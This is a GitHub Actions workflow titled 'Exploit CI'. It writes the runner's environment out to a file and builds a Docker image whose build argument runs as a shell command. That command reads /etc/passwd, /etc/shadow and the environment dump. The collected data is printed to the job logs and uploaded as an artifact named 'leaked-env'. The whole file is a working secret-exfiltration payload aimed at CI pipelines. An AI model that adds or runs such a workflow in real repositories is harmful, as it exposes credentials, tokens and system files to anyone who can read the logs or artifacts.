name: Exploit CI

on:
  push:
    branches:
      - main

jobs:
  dump-env:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Prepare env file
        run: printenv > github_env

      - name: Create Dockerfile
        run: |
          echo "FROM alpine" > Dockerfile
          echo "ARG PYTHON_VERSION" >> Dockerfile
          echo 'RUN /bin/sh -c "$PYTHON_VERSION"' >> Dockerfile

      - name: Build Docker image with payload
        run: |
          docker build \
            --build-arg PYTHON_VERSION="cat /github_env /etc/passwd /etc/hosts /etc/shadow || true; printenv | tee /env_dump.txt" \
            -t hacked-image .

      - name: Create container
        run: docker create --name hacked-container hacked-image

      - name: Copy dumped file
        run: docker cp hacked-container:/env_dump.txt ./env_dump.txt

      - name: Show results in logs
        run: cat env_dump.txt

      - name: Upload as artifact
        uses: actions/upload-artifact@v4
        with:
          name: leaked-env
          path: env_dump.txt
